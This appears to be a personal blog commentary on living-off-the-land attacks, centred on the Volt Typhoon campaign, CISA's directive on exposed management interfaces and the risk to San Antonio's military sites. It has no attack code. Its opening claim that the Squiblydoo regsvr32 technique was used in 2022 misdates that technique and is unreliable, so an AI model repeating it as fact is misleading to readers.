The Game Has Changed: 
Fileless Malware and Hackers Living Off the Land,
Part 2
In 2022, the Microsoft Windows Operating System was victimized when a vulnerability in a standard Windows Utility tool, regsvr32.exe, was attacked. Dubbed the "Squiblydoo" technique, threat actors will inject a tiny script of code "directly from the internet" and then "execute it." Since the attack does not make real any changes to the Windows Registry, but simply executes the script, nor are any rogue apps downloaded, there is little for traditional antimalware techniques and applications to detect. So, like all ongoing criminal conspiracies, the lack of detection of their criminal activities guarantees the crooks' success until such detection is made.
The use of an otherwise legitimate built-in tool to facilitate an attack without making any actual modification to the system in general is the textbook definition of a Living Off the Land attack. Indeed, like hungry bears let loose in a campground, today's hackers are Getting Fat Living Off the Land.
And, since they have to abbreviate every phrase these days, its called LOTL. LMFAO!
The Volt Typhoon attack brought LOTL attacks to the forefront of the news over the
past few months. Not only have US based cyber security agencies
sounded the alarm over Volt Typhoon, so have their counterparts in other
countries. The
Sydney Morning Herald, May 25, 2023, reported on
the Australian government's participation in, and being a signatory to,
the Joint Cybersecurity Advisory, entitled, "People's
Republic of China State-Sponsored Cyber Actor Living off the Land to
Evade
Detection"
released by CISA, May 24, 2023.
What was most alarming to the Australian government was that Chinese
cyber espionage actors were able to penetrate security at American
military installations at Guam, a South Pacific neighbor of Australia.
Home Affairs Minister Clare O’Neil is quoted as saying: "The
Australian government has joined with a number of other security
agencies from around the world to advise that there have been
evidence-based attacks on critical infrastructure associated with the
United States and that the origin of those attacks has been the Chinese
government."
The first report of Volt Typhoon, which came from Microsoft, dated May 24, 2023, entitled, "Volt Typhoon targets US critical infrastructure with living-off-the-land techniques," mentions in its second paragraph that "Volt Typhoon has been active since mid-2021 and has targeted critical infrastructure organizations in Guam and elsewhere in the United States." MS goes on to state that "initial access to targeted organizations through internet-facing Fortinet FortiGuard devices," had been the first attack vector. As Fortinet describes its affected products, "The FortiGuard Device Security suite offers advanced security technologies optimized to monitor and protect IoT and OT devices against device and vulnerability-based attack tactics." Once inside the compromised network, the attacker directs all its traffic through proxy networks, with all data collected sent "through compromised SOHO network edge devices (including routers). according to the MS report. Microsoft then goes on to name several popular brands of home and small office routers as vulnerable to this compromise, including Cisco, D-Link, and NETGEAR.
On June 12, 2023, CISA announced the first of a series of patches that Fortinet released over June and July 2023. The June 12 announcement, "Fortinet Releases Security Updates for FortiOS and FortiProxy," makes reference to and links to Fortinet's discussion of the Volt Typhoon Campaign. July 11, 2023, CISA announced the same Fortinet products were patched again.
Meanwhile, while all this Whole Lotta Patching is or is not Going On, the media that reports on such topics are sounding the big alarm bells about what might be the long-term strategic implications of the breadth of the Volt Typhoon attack. The July 31, 2023, Dark Reading article, "China's Volt Typhoon APT Burrows Deeper Into US Critical Infrastructure," quotes the New York Times initial reporting on the breadth of the Volt Typhoon attack. The Dark Reading article points out the difficulty in mitigating all instances of the attack. The attackers can be present "inside numerous networks controlling the communications, power, and water feeding US military bases at home and abroad." Moreover, since all networks regardless of scope or size connect to the same Internet, "those same networks also touch run of the mill businesses and individuals as well — and investigators are having a hard time assessing the full footprint of the infestation," reported Dark Reading.
Writing in Government Technology, July 31, 2023, Greg Jefferson, Business and Metro Editor of the San Antonio Express-New, expressed well that real fear that citizens of San Antonio, TX feel as their city may well be at ground zero for these attacks. Jefferson quoted John Dickson, a San Antonio-based cybersecurity consultant and former Air Force intelligence officer, who explained that in many ways San Antonio is a Company Town of the US Department of Defense that is especially at risk from the possible fallout from Volt Typhoon. "We are Military City, USA, and a sophisticated reader doesn't have to do too much to connect the dots," is how Dickson expressed the threat faced by San Antonio, Texas.
The US Military is certainly well represented in San Antonio. Several major military facilities are located in San Antonio. Among those listed in the govtech.com article are, "Fort Sam Houston, the largest military medical training installation in the U.S., as well as to JBSA-Randolph and JBSA-Lackland Air Force bases." On the cyberwar front, San Antonio is also home to the National Security Agency's Texas Cryptologic Center. From the Texas Cryptologic Center, Jefferson noted that, "The center conducts worldwide signals intelligence and cybersecurity operations. Signals intelligence involves collecting, decoding and interpreting electronic communications." Indeed, San Antonio, the second most populated city in Texas, and the seventh largest city in these US of A, represents an irresistible target for our nation's enemies in the ongoing cyberwar.
It is an unfortunate fact that the Federal Government can do little to impose its cyber security dictates on vulnerable consumers and their computer usage. Uncle Sam does, however, hold great sway over those entities whose networks intersect and interconnect with those of the Federal Government. On June 13, 2023, CISA released, "Binding Operational Directive 23-02: Mitigating the Risk from Internet-Exposed Management Interfaces." Essentially, CISA will give network admins 14 days from the BOD release to remove vulnerable devices from any Internet connected network. After the 14 days, CISA will scan federal networks for, among other things, "Devices residing on or supporting federal information systems and/or networks that belong to one of the following classes: routers, switches, firewalls, VPN concentrators," and are not in compliance. Those responsible for any at risk devices will be notified by CISA and given support and guidance on how best mitigate the vulnerabilities.
The explicit purpose here is to remove these vulnerable devices from any network that touches the Federal Government. "Inadequate security, misconfigurations, and out of date software make these devices more vulnerable to exploitation," and are therefore part of the reasons for CISA's actions here. Furthermore, as Matt Hayden, a former CISA official, and currently an executive at General Dynamics Information Technology, told The Federal News Network, June 13, 2023, unlike many CISA advisories patching alone will not mitigate the risk that these devices that are vulnerable to Volt Typhoon represent. "The latest BOD directs agencies to remove such devices from the internet or provide the additional “zero trust” protections, regardless of whether a patch has been applied or not," Hayden said.
As Ronen Ahdut wrote in an article entitled, "The Volt Typhoon wake-up call," that appeared in scmagazine.com, June 6, 2023, the "covert installation of “sleeper software” in a system lets a threat actor execute a future attack," can be likened to "Cold War-era fears that “sleeper” saboteurs from the Soviet Union were laying the groundwork for future attacks." All Computer Users should heed the advice of Roned Ahdut when the writer reminds us all that, although "State-backed threat actors are rapidly proliferating," we must "Make it harder for them to reach the end of the rainbow."
Volt Typhoon should serve as wake-up call to all computer Consumers that informs Consumers in the clearest terms possible that that old Router has got to go. If not for their own sake, but how about for the sake of San Antonio, Texas?
¯\_(ツ)_/¯
Gerald Reiff